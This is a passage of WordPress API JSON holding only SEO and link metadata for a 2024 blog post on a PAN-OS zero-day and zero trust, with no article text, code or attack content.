class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\"},\"author\":{\"name\":\"\",\"@id\":\"\"},\"headline\":\"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust\",\"datePublished\":\"2024-04-16T09:51:13+00:00\",\"dateModified\":\"2024-04-16T09:51:13+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\"},\"wordCount\":4702,\"publisher\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/#organization\"},\"image\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg\",\"articleSection\":[\"Zenith: Zscaler\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\",\"url\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\",\"name\":\"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust - JHC\",\"isPartOf\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg\",\"datePublished\":\"2024-04-16T09:51:13+00:00\",\"dateModified\":\"2024-04-16T09:51:13+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage\",\"url\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg\",\"contentUrl\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg\",\"width\":700,\"height\":467},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jacksonholdingcompany.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/#website\",\"url\":\"https:\/\/jacksonholdingcompany.com\/\",\"name\":\"JHC\",\"description\":\"Your Business Is Our Business\",\"publisher\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jacksonholdingcompany.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/#organization\",\"name\":\"JHC\",\"url\":\"https:\/\/jacksonholdingcompany.com\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png\",\"contentUrl\":\"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png\",\"width\":452,\"height\":149,\"caption\":\"JHC\"},\"image\":{\"@id\":\"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust - JHC","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/","og_locale":"en_US","og_type":"article","og_title":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust","og_description":"A Year of Critical Zero Days: Firewalls, VPNs, and more […]","og_url":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/","og_site_name":"JHC","article_published_time":"2024-04-16T09:51:13+00:00","og_image":[{"width":700,"height":467,"url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"23 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#article","isPartOf":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/"},"author":{"name":"","@id":""},"headline":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust","datePublished":"2024-04-16T09:51:13+00:00","dateModified":"2024-04-16T09:51:13+00:00","mainEntityOfPage":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/"},"wordCount":4702,"publisher":{"@id":"https:\/\/jacksonholdingcompany.com\/#organization"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage"},"thumbnailUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg","articleSection":["Zenith: Zscaler"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/","url":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/","name":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust - JHC","isPartOf":{"@id":"https:\/\/jacksonholdingcompany.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage"},"thumbnailUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg","datePublished":"2024-04-16T09:51:13+00:00","dateModified":"2024-04-16T09:51:13+00:00","breadcrumb":{"@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#primaryimage","url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg","contentUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2024\/04\/blog-tile-img-700x467-not-secured_0-H7OCWe.jpeg","width":700,"height":467},{"@type":"BreadcrumbList","@id":"https:\/\/jacksonholdingcompany.com\/another-cve-pan-os-zero-day-another-reason-to-consider-zero-trust\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/jacksonholdingcompany.com\/"},{"@type":"ListItem","position":2,"name":"Another CVE (PAN-OS Zero-Day), Another Reason to Consider Zero Trust"}]},{"@type":"WebSite","@id":"https:\/\/jacksonholdingcompany.com\/#website","url":"https:\/\/jacksonholdingcompany.com\/","name":"JHC","description":"Your Business Is Our Business","publisher":{"@id":"https:\/\/jacksonholdingcompany.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/jacksonholdingcompany.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/jacksonholdingcompany.com\/#organization","name":"JHC","url":"https:\/\/jacksonholdingcompany.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/","url":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png","contentUrl":"https:\/\/jacksonholdingcompany.com\/wp-content\/uploads\/2023\/07\/cropped-cropped-jHC-white-500-\u00d7-200-px-1-1.png","width":452,"height":149,"caption":"JHC"},"image":{"@id":"https:\/\/jacksonholdingcompany.com\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts\/2969","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/types\/post"}],"replies":[{"embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/comments?post=2969"}],"version-history":[{"count":0,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/posts\/2969\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/media\/2962"}],"wp:attachment":[{"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/media?parent=2969"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/categories?post=2969"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacksonholdingcompany.com\/wp-json\/wp\/v2\/tags?post=2969"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}